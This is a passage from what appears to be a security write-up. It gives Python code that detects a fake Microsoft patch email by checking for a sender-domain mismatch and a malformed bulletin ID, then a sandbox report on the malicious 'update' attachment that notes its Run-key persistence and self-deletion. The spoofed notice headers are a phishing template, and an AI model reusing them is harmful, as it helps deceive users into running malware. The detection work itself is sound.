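# Header block from the sanitized email quoted above (the submitter snipped the
# Received: lines).  The one-line body is a constructed stand-in for the HTML;
# only the headers are examined here.
FAKE_PATCH_MAIL = """\
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>

(HTML body omitted)
"""

# Constructed contrast case: Message-Id host belongs to the organisation named in
# From:, and the bulletin ID has the usual two-digit-year, three-digit-number shape.
CLEAN_NOTICE = """\
Date: Tue, 12 Jun 2007 10:00:00 -0700
To: Patrick
Subject: Microsoft Security Bulletin MS07-001 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Message-Id: <constructed-example-id@mail.microsoft.com>

(body omitted)
"""

BULLETIN_TOKEN = re.compile(r"\bMS\d{2}-\d+\b")    # anything shaped like a bulletin ID
BULLETIN_VALID = re.compile(r"^MS\d{2}-\d{3}$")     # the real form: MSyy-nnn


def sender_domain(msg) -> str:
    """Domain the From: header claims the mail comes from."""
    return parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()


def message_id_domain(msg) -> str:
    """Domain of the host that generated the Message-Id."""
    return msg.get("Message-Id", "").strip().strip("<>").rpartition("@")[2].lower()


def same_org(host: str, claimed: str) -> bool:
    """True when host is the claimed domain or a subdomain of it."""
    return host == claimed or host.endswith("." + claimed)


def check_patch_notice(raw: str) -> dict:
    """Map finding name -> explanation; an empty dict means nothing suspicious was seen."""
    msg = message_from_string(raw)
    findings = {}
    claimed, origin = sender_domain(msg), message_id_domain(msg)
    if claimed and origin and not same_org(origin, claimed):
        findings["sender-domain-mismatch"] = (
            f"From: claims {claimed} but the Message-Id was generated at {origin}")
    for token in BULLETIN_TOKEN.findall(msg.get("Subject", "")):
        if not BULLETIN_VALID.match(token):
            findings["bad-bulletin-id"] = f"{token} is not of the form MSyy-nnn"
    return findings


if __name__ == "__main__":
    for name, raw in (("fake patch mail", FAKE_PATCH_MAIL), ("clean notice", CLEAN_NOTICE)):
        print(name, "->", check_patch_notice(raw) or "no findings")
```

The Message-Id comparison is a weak signal on its own (mail relayed through a third party can legitimately carry another host's ID), which is why the two findings are reported separately rather than folded into a single score; together with the diary's observations about spelling and the licence key format they are enough to stop a user short of running the attached "update".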

From Norman Sandbox:

MSOUTRC2007Update-KB863892.exe : INFECTED with W32/Malware (Signature: NO_VIRUS)

 [ DetectionInfo ]
    * Sandbox name: W32/Malware
    * Signature name: NO_VIRUS
 [ General information ]
    * Drops files in %WINSYS% folder.
    * File length:        20480 bytes.
    * MD5 hash: c7a8bde380043b5d8d7229e82db1c2fc.
 [ Changes to filesystem ]
    * Creates file C:\WINDOWS\SYSTEM32\sdoctor.exe.
    * Creates file C:\france.html.
    * Deletes file c:\france.html.
 [ Changes to registry ]
    * Creates value "SpywareDoctor"="C:\WINDOWS\SYSTEM32\sdoctor.exe" in key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
 [ Process/window information ]
    * Will automatically restart after boot (I'll be back...).
    * Attemps to NULL C:\COMMAND.COM /c del c:\sample.exe >> NUL.